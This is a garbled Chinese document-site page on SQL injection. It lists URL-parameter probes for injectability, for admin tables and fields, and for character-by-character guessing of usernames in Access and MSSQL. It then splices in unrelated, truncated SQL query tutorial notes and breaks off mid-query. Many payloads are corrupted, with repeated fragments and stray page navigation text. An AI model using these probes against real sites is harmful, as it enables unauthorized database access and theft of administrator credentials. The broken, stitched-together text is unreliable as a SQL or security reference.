快速学习，理解.SQL注入技术.docVIP

　　快速学习，理解.SQL注入技术～教育资源库 　　检测可否注入 　　127.0.0.1/xx?id=11 and 1=1 (正常页面) 　　127.0.0.1/xx?id=11 and 1=2 (出错页面) 　　检测表段的 　　127.0.0.1/xx?id=11 and exists (select * from admin) 　　检测字段的 　　127.0.0.1/xx?id=11 and exists (select username from admin) 　　检测ID 　　127.0.0.1/xx?id=11 and exists (select id from admin admin e)=5 and ID=1) 　　检测长度的 　　127.0.0.1/xx?id=11 and exists (select id from admin e)=5 and ID=1) 　　检测是否为MSSQL数据库 　　127.0.0.1/xx?id=11 and exists (select * from sysobjects) 　　检测是否为英文 　　(ACCESS数据库) 　　127.0.0.1/xx?id=11 and exists (select id from admin id(username,1,1)) bet admin e,1,1)) bet admin id(username,1,1)) bet admin e,1,1)) bet admin id(username,1,1))=97 and ID=1) 　　(MSSQL数据库) 　　127.0.0.1/xx?id=11 and exists (select id from admin e,1,1))=97 and ID=1) 　　常用函数 　　Access：asc(字符)　SQLServer：unicode(字符) 　　作用：返回某字符的ASCII码 　　Access：chr(数字)　SQLServer：nchar(数字) 　　作用：与asc相反，根据ASCII码返回字符 　　Access：mid(字符串,N,L)　SQLServer：substring(字符串,N,L) 　　作用：返回字符串从N个字符起长度为L的子字符串，即N到N+L之间的字符串 　　Access：abc(数字)　SQLServer：abc (数字) 　　作用：返回数字的绝对值（在猜解汉字的时候会用到） 　　Access：A bet 用户 order by id) 　　1.在查询结果中显示列名： 　　a.用as关键字：select name as #39;姓名#39; 　from students order by age 　　b.直接表示：select name #39;姓名#39; 　from students order by age 　　2.精确查找: 　　a.用in限定范围：select * from students students students e = #39;李山#39; 　　d.like:select * from students e like #39;李%#39; (注意查询条件中有%，则说明是部分匹配，而且还有先后信息在里面，即查找以李开头的匹配项。所以若查询有李的所有对象，应该命令：#39;%李%#39;;若是第二个字为李，则应为#39;_李%#39;或#39;_李#39;或#39;_李_#39;。) 　　e.[]匹配检查符：select * from courses courses where 123下一页 友情提醒：，特别！o like #39;[A-C]%#39;) 　　3.对于时间类型变量的处理 　　a.smalldatetime：直接按照字符串处理的方式进行处理，例如：select * from students students (求学生总人数) 　　b.avg(列)求平均，如：select avg(mark) from grades ax(列)和min(列)，求最大与最小 　　5.分组group 　　常用于统计时，如分组查总数：select gender,count(sno) from students group by gender(查看男女学生各有多少) 　　注意：从哪种角度分组就从哪列group by 　　对于多重分组，只需将分组规则罗列。比如查询各届各专业的男女同学人数 ，那么分组规则有：届别(grade)、专业(mno)和 　　性别(gender)，所以有group by grade, mno, gender 　　select grade, mno